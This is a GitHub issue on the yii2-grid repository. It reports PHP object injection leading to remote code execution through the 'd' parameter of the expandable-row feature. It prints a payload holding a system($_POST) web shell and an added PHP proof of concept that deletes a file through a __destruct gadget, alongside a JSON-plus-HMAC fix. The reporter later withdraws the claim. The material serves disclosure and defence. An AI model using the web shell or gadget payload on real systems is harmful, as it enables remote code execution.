kartik-v / yii2-grid

Enhanced GridView with various utilities for Yii Framework 2.0
http://demos.krajee.com/grid

Remote Code Execution – PHP Insecure Object Injection #970

Closed Ziggizag closed 3 years ago

Ziggizag commented 3 years ago

Hi Kartik,

It's about the "expandable" functionality: [image attachment]

It's possible to "inject" an unvetted serialized command within the "d" variable used to load expanded data and this way execute code remotely: [image attachment]

E.g. injection of serialized code like this:

[{"Name":"foo","Value":"bar","Domain":"<?php echo system($_POST['poc']); ?>","Path":"\/","Max-Age":null,"Expires":1604415553,"Secure":false,"Discard":false,"HttpOnly":false}]

Where 'poc' is whatever code is passed through POST.

It's recommended to use JSON encoding rather than PHP serialization, and to implement verification of the serialized data with some uniquely salted hash function.
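As an added example (not yii2-grid's code and not the reporter's), the following PHP script shows the bug class described in the comment above and the mitigation it recommends side by side: a `d` request parameter fed straight to `unserialize()`, where any class with a magic method becomes a gadget, next to a loader that carries the same data as JSON and accepts it only when an HMAC computed with a server-side key matches. The parameter name `d` is taken from the issue; `TempFileCleanup`, `loadExpandedRowInsecure`, `encodeExpandedRow` and `loadExpandedRowSecure` are hypothetical names chosen for illustration, and the sample payload is constructed here.

```php
<?php
// Added example, not yii2-grid code: an unserialize() sink on a request parameter
// ("d", as in the issue) beside a JSON + HMAC loader. Class and function names are
// hypothetical. Requires PHP 7.4+.
declare(strict_types=1);

// Any class with a magic method becomes a gadget once unserialize() can build it:
// PHP calls __destruct() on the injected object with attacker-chosen properties.
final class TempFileCleanup
{
    public string $path;

    public function __construct(string $path)
    {
        $this->path = $path;
    }

    public function __destruct()
    {
        // Meant for the app's own temp files; an injected object chooses the path.
        if (is_file($this->path)) {
            unlink($this->path);
        }
    }
}

// Vulnerable: the request decides which classes get instantiated.
function loadExpandedRowInsecure(string $d)
{
    return unserialize(base64_decode($d));
}

// Hardened: JSON cannot instantiate objects, and the HMAC means only blobs the
// server produced with $key are accepted, so a tampered "d" is rejected up front.
function encodeExpandedRow(array $data, string $key): string
{
    $json = json_encode($data, JSON_THROW_ON_ERROR);
    $mac  = hash_hmac('sha256', $json, $key);
    return base64_encode($mac . '.' . $json);
}

function loadExpandedRowSecure(string $d, string $key): ?array
{
    $raw = base64_decode($d, true);
    if ($raw === false || ($dot = strpos($raw, '.')) === false) {
        return null;
    }
    $mac  = substr($raw, 0, $dot);
    $json = substr($raw, $dot + 1);
    // Constant-time compare of the recomputed MAC against the supplied one.
    if (!hash_equals(hash_hmac('sha256', $json, $key), $mac)) {
        return null;
    }
    $data = json_decode($json, true);
    return is_array($data) ? $data : null;
}

// --- demo with constructed input; run from the command line ---
$key    = random_bytes(32);                    // server secret the attacker lacks
$victim = tempnam(sys_get_temp_dir(), 'poc');  // file the injected gadget will delete

// The serialized form is written by hand so that no real TempFileCleanup object
// exists on our side (constructing one locally would fire __destruct here too).
$gadget  = sprintf('O:15:"TempFileCleanup":1:{s:4:"path";s:%d:"%s";}', strlen($victim), $victim);
$payload = base64_encode($gadget);             // what an attacker puts into ?d=

// The object is built, discarded at the end of the statement, and __destruct runs.
loadExpandedRowInsecure($payload);
printf("victim file still exists after unserialize: %s\n", var_export(file_exists($victim), true));

// Same payload against the hardened loader: no valid MAC, so nothing is decoded.
var_dump(loadExpandedRowSecure($payload, $key));

// A blob the server signed itself round-trips.
$signed = encodeExpandedRow(['id' => 42, 'expanded' => true], $key);
var_dump(loadExpandedRowSecure($signed, $key));

// Changing one byte of the JSON part invalidates the MAC and the blob is rejected.
$tampered = base64_encode(str_replace('"id":42', '"id":43', base64_decode($signed)));
var_dump(loadExpandedRowSecure($tampered, $key));
```

Run it with `php poc.php`. The two halves of the fix do different jobs: `json_decode` alone already removes the object-injection sink, because JSON has no way to name a PHP class, while the HMAC stops a client from editing the expanded-row parameters at all. The key must live only on the server; a "salt" the client can see gives no protection. Where a legacy format cannot be changed, `unserialize($s, ['allowed_classes' => false])` turns every object in the blob into `__PHP_Incomplete_Class` and so neutralizes gadgets, but it still leaves the data itself unauthenticated.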

Ziggizag commented 3 years ago

OK - this is actually not related to the Yii2 grid component. Sorry.